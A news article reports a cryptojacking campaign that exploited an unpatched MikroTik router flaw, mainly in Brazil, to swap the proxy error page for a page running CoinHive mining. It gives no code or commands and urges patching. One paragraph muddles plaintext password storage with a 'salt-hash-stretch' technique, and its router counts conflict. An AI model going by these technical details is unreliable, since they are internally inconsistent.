Currently, the malware is targeting unpatched MikroTik routers in Brazil but researchers believe it’s about time it will spread worldwide.
Unpatched routers manufactured by MikroTik have become potential targets of cryptojacking malware campaigns in Brazil. According to the analysis of Trustwave’s security researcher Simon Kenin, an unprecedented increment in web-based cryptojacking/cryptomining attacks in Brazil has been observed. Over 170,000 routers manufactured by the Latvia-based networking firm MikroTik are used in this campaign.
Initially, a large number of Brazilian users were targeted by cybercriminals to create mining botnet army. This army of botnets is used to spread malware for infecting the compromised devices. An outdated software patch is believed to be the main cause of compromising of such a massive number of routers.
According to a blog post by Simon, what happened was that the company patched a remote access vulnerability in April 2018. This vulnerability could have allowed attackers to gain unauthorized access to MikroTik routers remotely. After fixing the flaw, the security researchers published a PoC (proof-of-concept) exploit to explain the method of gaining access to MikroTik devices.
This particular vulnerability has been used in at least three cryptomining attacks, the first of which affected around 183,700 routers. Subsequent two attacks managed to affect 16,000 and 25,000 routers located in Moldova. This means, the campaign isn’t limited to any particular geographic location, which indeed is an alarming feature of the campaign. That’s why security researchers are urging MikroTik routers users to immediately patch their devices because cybercriminals are hunting for unpatched routers.
For your information, the April patch was a result of MikroTik’s own investigation in which the security flaw was detected. This particular flaw can serve as a “special tool to connect to the [administration] port, and request the system user database file.” The flaw lets attackers read any file off the router, which allows them an easy opportunity to steal data. The user database file is most crucial in this regard because of MikroTik stores usernames and passwords in plaintext format in this database.
Using the salt-hash-stretch cryptographic technique, an attacker can verify if the password is correct or not by matching it against an entry in the database and gain a unique match string. The MikroTik admin-port is being used the attack-vector in the latest campaigns.
Kenin revealed that attackers replaced MikroTik’s built-in web proxy file called error.html, which is launched whenever there is a proxy-related error, and uploaded a webpage in its place that leads to CoinHive’s cryptomining software. So, you only get cryptojacked when you are using a MikroTik proxy to access the web and the mining process lasts only until you exit the browser.
Companies often make the mistake of ignoring these kinds of vulnerabilities and patches are delayed for weeks or months, which helps cybercriminals in more than one ways.
Image credit: Depositphotos